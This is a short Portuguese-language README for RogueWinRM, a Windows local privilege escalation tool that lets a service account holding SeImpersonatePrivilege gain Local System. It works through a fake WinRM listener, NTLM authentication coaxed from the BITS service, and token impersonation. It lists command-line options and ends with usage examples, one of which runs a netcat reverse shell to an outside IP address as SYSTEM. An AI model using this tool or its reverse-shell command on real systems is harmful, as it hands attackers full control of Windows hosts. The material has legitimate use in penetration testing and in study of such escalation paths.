
Escalação de Privilégio Local do Windows de Conta de Serviço para Sistema
RogueWinRM é uma exploração de escalonamento de privilégio local que permite escalar de uma conta de Serviço (com SeImpersonatePrivilege) para a conta Sistema Local se o serviço WinRM não estiver em execução (padrão no Win10, mas NÃO no Windows Server 2019).
Resumidamente, ele ouvirá por conexões de entrada na porta 5985 fingindo ser um serviço WinRM real.
É apenas um servidor web mínimo que tentará negociar uma autenticação NTLM com qualquer serviço que esteja tentando conectar nessa porta.
Então o serviço BITS (executando como Sistema Local) é acionado e tentará autenticar no nosso listener malicioso. Uma vez autenticado no nosso listener malicioso, somos capazes de personificar o usuário Sistema Local gerando um processo arbitrário com esses privilégios.
Você pode encontrar uma descrição técnica completa dessa vulnerabilidade neste link --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
RogueWinRM
Mandatory args:
-p <program>: program to launch
Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Executando um cmd interativo:
RogueWinRM.exe -p C:\windows\system32\cmd.exe
Executando um reverse shell netcat:
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"